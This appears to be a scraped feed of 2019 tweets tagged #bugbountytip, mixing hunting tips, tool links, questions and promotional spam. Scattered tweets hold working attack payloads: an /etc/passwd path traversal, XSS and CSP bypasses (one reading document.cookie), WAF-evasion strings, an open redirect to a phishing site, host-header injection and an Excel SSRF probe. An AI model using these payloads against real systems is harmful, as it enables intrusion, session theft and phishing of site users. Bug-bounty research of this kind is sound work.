1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learned that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan does not index. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-10 11:54:38
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan #BugBountyTips #bugbountytip #bugbounty
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-10 06:48:04
0 #BugBountyTip To discover domains deployed on Github for subdomain takeover. Go to https://t.co/oLL4MCjX1S and search for "There isn't a Github Pages site here" Googledork: intitle:"Site not found · GitHub Pages" intext:"There isn't a Github Pages site here"
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (incorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
RĂ©my Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like —// Follow Us -- https://t.co/S9CwjVYiHO #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHO #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 if you find a Form where you need ( Email + Date of birth + Zip code) to login , try to remove Zip code and Date of birth and send the form . #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-09 12:47:35
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluzđŸ”„
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter an endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It đŸ”„đŸ’• #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-08 10:23:58
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-07 06:06:27
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec 🚀
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Inperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-06 08:01:17
3 during a web pentesting operations when seeing a Registration page you should try register with an existing username, to see if you can enumerate users. this is what i saw on @PayPal you can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluzđŸ”„
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 I have uploaded 38 new articles as PDF files about different fields of hacking to my github repository. Enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-06 04:28:06
4 I have uploaded 38 new articles as PDF files about different fields of hacking to my github repository. Enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and i am able to see all the information in incognito/different browser but When i loggin from a different account the page is not being cached #bugbountytip #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-05 19:29:36
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
bugbountytip
@a_l_e_r_t_1_


2019-10-05 12:39:03
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamer’s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome ❎ Firefox ✅ #Bugbountytip https://t.co/nB1NqVdEPK
Ammar Amer đŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-04 13:37:36
2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day 😊 #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It may be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP strip tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-04 09:41:07
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in a email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are only one you should compare and compete with. #bugbountytip
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bugbountytip
@a_l_e_r_t_1_


2019-10-03 08:05:53
1 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters 😎 https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
bugbountytip
@a_l_e_r_t_1_


2019-10-02 21:04:44
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSSÂŽ payload, shake dice. đŸŽČ <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluzđŸ”„
@haknfuk


2019-10-02 14:44:09
0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability đŸ€‘đŸ€‘đŸ€‘đŸ€‘ https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluzđŸ”„
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
bugbountytip
@a_l_e_r_t_1_


2019-10-01 12:01:20
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast on the 28th of October. Who's excited? Comment below 👇 what you'd love to hear and tag whom you'd be interested to have as guests đŸ„ł #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! This release is specially dedicated to @SlackHQ! An issue that prevented pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure report or not Find post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it i got only one of cookie value. #bugbountytips #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
1 Try parameter pollution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better than this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi đŸ•Šïž
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi đŸ•Šïž
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec 🚀
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
0 @amazon I know you people have private bug bounty where you guys pay well.. Why dont you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do UDP scan and if you found port 500 then run ike-probe to see if it's vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit 💰💰 Comment If Your Favourite Tool is Missing ! 💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ 💰💰💰💰💰 HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ 💰💰💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizer’s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN ThâœȘsH
